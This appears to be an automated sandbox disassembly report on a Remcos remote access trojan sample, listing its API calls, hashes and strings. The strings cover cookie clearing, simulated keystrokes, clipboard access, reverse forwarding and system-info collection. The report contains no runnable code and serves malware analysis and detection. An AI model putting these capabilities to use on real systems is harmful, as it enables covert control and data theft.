                                • Opcode Fuzzy Hash: f585475f6b8ab2e405adadd23c5203a1a4cbbe8530a351afb4dab49d1aabd258
                                • Instruction Fuzzy Hash: 37412AB5B406017BD608777A8E1B96E7625AB81304B50017FF901136D2EBBD9C2197DF
                                APIs
                                • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00415A1A
                                  • Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A228
                                • Sleep.KERNEL32(00000064), ref: 00415A46
                                • DeleteFileW.KERNEL32(00000000), ref: 00415A7A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CreateDeleteExecuteShellSleep
                                • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                • API String ID: 1462127192-2001430897
                                • Opcode ID: 588032217042f102b569d258d12ef4b9a752e172f960098ad591eb97a38a28d9
                                • Instruction ID: 7fbd65b43d39327dc9f625a99f058064c4c6325298edc9245ab65683dcac2845
                                • Opcode Fuzzy Hash: 588032217042f102b569d258d12ef4b9a752e172f960098ad591eb97a38a28d9
                                • Instruction Fuzzy Hash: FA315E719402199ACB04FBA1DC96DEE7768EF50308F40017FF506731E2EE785E8ACA99
                                APIs
                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041B22B
                                  • Part of subcall function 0041B2C4: RegisterClassExA.USER32(00000030), ref: 0041B310
                                  • Part of subcall function 0041B2C4: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041B32B
                                  • Part of subcall function 0041B2C4: GetLastError.KERNEL32 ref: 0041B335
                                • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041B262
                                • lstrcpynA.KERNEL32(00471AF8,Remcos,00000080), ref: 0041B27C
                                • Shell_NotifyIconA.SHELL32(00000000,00471AE0), ref: 0041B292
                                • TranslateMessage.USER32(?), ref: 0041B29E
                                • DispatchMessageA.USER32(?), ref: 0041B2A8
                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041B2B5
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                • String ID: Remcos
                                • API String ID: 1970332568-165870891
                                • Opcode ID: 6a629144b245819b38f2933f29616ef2380529a0a937335efbac9e54df28edc4
                                • Instruction ID: 392c2ce23d615fe7cfca65c1bdf78dc563e79c4ff08160ae13be93183ad442b8
                                • Opcode Fuzzy Hash: 6a629144b245819b38f2933f29616ef2380529a0a937335efbac9e54df28edc4
                                • Instruction Fuzzy Hash: CD013971901308ABCB10DBB9ED4EEDB7BBCFB85B05F40417AF51992061D7B89489CB68
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d7410a98b278d9d25d0fcdc47fb7c960ad5f7d9b58d6d06d1c87314e37a5ed65
                                • Instruction ID: 53180985ac70b1d9c95f382170f9691aec8243d5c40cf1d2be039b65846bfc46
                                • Opcode Fuzzy Hash: d7410a98b278d9d25d0fcdc47fb7c960ad5f7d9b58d6d06d1c87314e37a5ed65
                                • Instruction Fuzzy Hash: 2DC12970D44245AFEB11DFA8D841BEEBBB0BF19304F04419AE844A7392C7798D51DB6B
                                APIs
                                • GetCPInfo.KERNEL32(?,?), ref: 0045100F
                                • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00451092
                                • __alloca_probe_16.LIBCMT ref: 004510CA
                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00451125
                                • __alloca_probe_16.LIBCMT ref: 00451174
                                • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 0045113C
                                  • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B
                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 004511B8
                                • __freea.LIBCMT ref: 004511E3
                                • __freea.LIBCMT ref: 004511EF
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                • String ID:
                                • API String ID: 201697637-0
                                • Opcode ID: 6ebe38f30125ab260d7bf90636684c5f617b7255880676fca2bd247c862c4a42
                                • Instruction ID: 005ec385ace484c3041e352596739c7debf7d66643145b34d09858c349e559c3
                                • Opcode Fuzzy Hash: 6ebe38f30125ab260d7bf90636684c5f617b7255880676fca2bd247c862c4a42
                                • Instruction Fuzzy Hash: C191D632E002169BDB209EA5C881BAF7BB59F09716F14025BED00E7292D72DDD89C768
                                APIs
                                  • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                                  • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                  • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                                  • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                • _memcmp.LIBVCRUNTIME ref: 00442935
                                • _free.LIBCMT ref: 004429A6
                                • _free.LIBCMT ref: 004429BF
                                • _free.LIBCMT ref: 004429F1
                                • _free.LIBCMT ref: 004429FA
                                • _free.LIBCMT ref: 00442A06
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$ErrorLast$_abort_memcmp
                                • String ID: C
                                • API String ID: 1679612858-1037565863
                                • Opcode ID: 3cd607daeafeb172cd12d40b3ef98e411c3f82b6d125e495381489309ccb8190
                                • Instruction ID: aeaf983377083d43a1268bd0837f448671c9c2270315b144058cc99b7af0bbb4
                                • Opcode Fuzzy Hash: 3cd607daeafeb172cd12d40b3ef98e411c3f82b6d125e495381489309ccb8190
                                • Instruction Fuzzy Hash: C6B14B75A01219DFEB24DF19C984AAEB7B4FF08314F5045AEE849A7350E774AE90CF44
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: tcp$udp
                                • API String ID: 0-3725065008
                                • Opcode ID: 688bcc682103751b5d6e0fc50f4ff73081394bc5db4df513150874dffde81862
                                • Instruction ID: 0146648cb9627796ba72a5075a1bb19f593c332394d5faf8ede73001e6eead87
                                • Opcode Fuzzy Hash: 688bcc682103751b5d6e0fc50f4ff73081394bc5db4df513150874dffde81862
                                • Instruction Fuzzy Hash: 0271AB306083029FDB24CF55C4456ABBBE5AB88B06F14483FF88587351DB78CE85CB8A
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: Eventinet_ntoa
                                • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
                                • API String ID: 3578746661-168337528
                                • Opcode ID: 8c5701e6cc9f7fb126a1b4df8ec95793ff9840fd8e0c3355c2e69ecdaa70aa10
                                • Instruction ID: 6b7c77c2de925f44c7fd0444b04eaa142d1c015a05a303cede5520b91582e870
                                • Opcode Fuzzy Hash: 8c5701e6cc9f7fb126a1b4df8ec95793ff9840fd8e0c3355c2e69ecdaa70aa10
                                • Instruction Fuzzy Hash: 1B51C671A043005BC704FB35E81AAAE36A56B85304F50453FF942972E2EFBD998987CF
                                APIs
                                • Sleep.KERNEL32(00001388), ref: 00409738
                                  • Part of subcall function 0040966D: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409745), ref: 004096A3
                                  • Part of subcall function 0040966D: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409745), ref: 004096B2
                                  • Part of subcall function 0040966D: Sleep.KERNEL32(00002710,?,?,?,00409745), ref: 004096DF
                                  • Part of subcall function 0040966D: CloseHandle.KERNEL32(00000000,?,?,?,00409745), ref: 004096E6
                                • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00409774
                                • GetFileAttributesW.KERNEL32(00000000), ref: 00409785
                                • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040979C
                                • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409816
                                  • Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A228
                                • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00469654,00000000,00000000,00000000), ref: 0040991F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                • String ID: @8T
                                • API String ID: 3795512280-4097998276
                                • Opcode ID: e5d4529cbef31fa4238917c745ea136b108e3ac5cd2eee8885055f6e3b382454
                                • Instruction ID: 85d6828eff9e87111454ffe40de9a07a949f8ec8799fb43d86416e8e02d17308
                                • Opcode Fuzzy Hash: e5d4529cbef31fa4238917c745ea136b108e3ac5cd2eee8885055f6e3b382454
                                • Instruction Fuzzy Hash: 9D513D712043015BCB14BB72C9A6ABF76999F90308F00453FB946B72E3DF7D9D09869A
                                APIs
                                • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00471E78,00462F54,?,00000000,0040708D,00000000), ref: 00406A56
                                • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,0040708D,00000000,?,?,0000000A,00000000), ref: 00406A9E
                                • CloseHandle.KERNEL32(00000000,?,00000000,0040708D,00000000,?,?,0000000A,00000000), ref: 00406ADE
                                • MoveFileW.KERNEL32(00000000,00000000), ref: 00406AFB
                                • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00406B26
                                • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00406B36
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseHandle$CreateDeleteMoveWrite
                                • String ID: .part
                                • API String ID: 1511717022-3499674018
                                • Opcode ID: 2ab30280b9316990576d501d0fae2c6b614aff3488e0ee63556874e7d9b7435f
                                • Instruction ID: 678cfffe15af58d7f0b712f13b91f409224560124cae5e22a1f642ab954cf825
                                • Opcode Fuzzy Hash: 2ab30280b9316990576d501d0fae2c6b614aff3488e0ee63556874e7d9b7435f
                                • Instruction Fuzzy Hash: 183195715043519FC210FF61D8859AFB7E8EF84305F40493FB946A21E1DB78DE488B9A
                                APIs
                                  • Part of subcall function 00411F91: RegOpenKeyExA.KERNELBASE(80000002,00000400,00000000,00020019,?), ref: 00411FB5
                                  • Part of subcall function 00411F91: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00411FD2
                                  • Part of subcall function 00411F91: RegCloseKey.KERNELBASE(?), ref: 00411FDD
                                • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040AEAC
                                • PathFileExistsA.SHLWAPI(?), ref: 0040AEB9
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$P0F$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                • API String ID: 1133728706-1451598199
                                • Opcode ID: 95fff169455ce68c0b5a277e3f6e58ad6cae9d31946e4611f9b4ae704eb31903
                                • Instruction ID: 9e227284a7a69f00510d3be81dd7cde1580ac9a58a9ca8fbd928e09bf644cbd9
                                • Opcode Fuzzy Hash: 95fff169455ce68c0b5a277e3f6e58ad6cae9d31946e4611f9b4ae704eb31903
                                • Instruction Fuzzy Hash: CF21B170A4020556CB00FBE2CC97DEE7368AF51348F80013FB901772D2EB795A45C6DA
                                APIs
                                • _free.LIBCMT ref: 00441566
                                  • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                                  • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                                • _free.LIBCMT ref: 00441578
                                • _free.LIBCMT ref: 0044158B
                                • _free.LIBCMT ref: 0044159C
                                • _free.LIBCMT ref: 004415AD
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast
                                • String ID: pF$KS
                                • API String ID: 776569668-4051209147
                                • Opcode ID: dc25ad9d7c881d5a7498954b547f4469e613371529959f9048218c6a37a16c45
                                • Instruction ID: 534a9c52bd02544fd4565401bb604a6095318b382a753ef56e7f6fd0a1c42297
                                • Opcode Fuzzy Hash: dc25ad9d7c881d5a7498954b547f4469e613371529959f9048218c6a37a16c45
                                • Instruction Fuzzy Hash: 00F030B78052209BD7016F55BC864053BA0BB04B29305853BF8ADE6670FBB90A458F8E
                                APIs
                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0043E2F6,0043E2F6,?,?,?,00447215,00000001,00000001,80E85006), ref: 0044701E
                                • __alloca_probe_16.LIBCMT ref: 00447056
                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00447215,00000001,00000001,80E85006,?,?,?), ref: 004470A4
                                • __alloca_probe_16.LIBCMT ref: 0044713B
                                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,80E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044719E
                                • __freea.LIBCMT ref: 004471AB
                                  • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B
                                • __freea.LIBCMT ref: 004471B4
                                • __freea.LIBCMT ref: 004471D9
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                • String ID:
                                • API String ID: 3864826663-0
                                • Opcode ID: 04037ebd5a1a4f50f5415f33d7545ea1837db620aa2cb0a216d5dedd30da5abc
                                • Instruction ID: 54c76e5b98bc3e662f405ec50a570bffd16f8396d3d33e450f7b83ec1f761fab
                                • Opcode Fuzzy Hash: 04037ebd5a1a4f50f5415f33d7545ea1837db620aa2cb0a216d5dedd30da5abc
                                • Instruction Fuzzy Hash: C051F372604216AFFB258F65CC81EAF77A9EB44754F19422EFC04D6340EB38DC4296A8
                                APIs
                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00417982
                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179A3
                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179C3
                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179D7
                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179ED
                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00417A0A
                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00417A25
                                • SendInput.USER32(00000001,?,0000001C,?,00000000), ref: 00417A41
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: InputSend
                                • String ID:
                                • API String ID: 3431551938-0
                                • Opcode ID: 6aaf5890e5c1829a4f0a9f9de961f2057ca44ae286fc2f2a8f4f79c9cdb01491
                                • Instruction ID: 18205c9a4f61e0979ba7f31da2e0396e133b47f61cec1eebe1044e0c870e5742
                                • Opcode Fuzzy Hash: 6aaf5890e5c1829a4f0a9f9de961f2057ca44ae286fc2f2a8f4f79c9cdb01491
                                • Instruction Fuzzy Hash: BF3180715583086EE311CF51D941BEBBFECEF99B54F00080FF6809A191D2A696C98BA7
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlock
                                • String ID:
                                • API String ID: 2813074840-0
                                • Opcode ID: 1ffc4b267463cd0963ccde96e95f83742c66c38552b605f7a87e557baad1c83c
                                • Instruction ID: b342c93700c1c5b5557293b3c64df63ecfc3f94f93ee8c928ebb46f035b43356
                                • Opcode Fuzzy Hash: 1ffc4b267463cd0963ccde96e95f83742c66c38552b605f7a87e557baad1c83c
                                • Instruction Fuzzy Hash: 7C015E312443009BD314BF71DC596AA76A8EBE0346F81057EB94A931A3DF3899498A9A
                                APIs
                                • RegEnumKeyExA.ADVAPI32 ref: 0041A47F
                                • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0041A4B0
                                • RegCloseKey.ADVAPI32(?), ref: 0041A749
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseEnumOpen
                                • String ID: DisplayName
                                • API String ID: 1332880857-3786665039
                                • Opcode ID: 990104b7cba7af691029d385b930f1776e062702f879198157bcb1f4d53fc8db
                                • Instruction ID: 4431336161eaad6e2d2aa402c01db4654b3b7c935e82bf046b55a61e03329e01
                                • Opcode Fuzzy Hash: 990104b7cba7af691029d385b930f1776e062702f879198157bcb1f4d53fc8db
                                • Instruction Fuzzy Hash: 966132311182419BC328EB51D891EEFB3E8EF94348F50493FF586921E2EF749949CA5A
                                APIs
                                • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00447ECC,00453EB5,00000000,00000000,00000000,00000000,00000000), ref: 00447799
                                • __fassign.LIBCMT ref: 00447814
                                • __fassign.LIBCMT ref: 0044782F
                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00447855
                                • WriteFile.KERNEL32(?,00000000,00000000,00447ECC,00000000,?,?,?,?,?,?,?,?,?,00447ECC,00453EB5), ref: 00447874
                                • WriteFile.KERNEL32(?,00453EB5,00000001,00447ECC,00000000,?,?,?,?,?,?,?,?,?,00447ECC,00453EB5), ref: 004478AD
                                Memory Dump Source
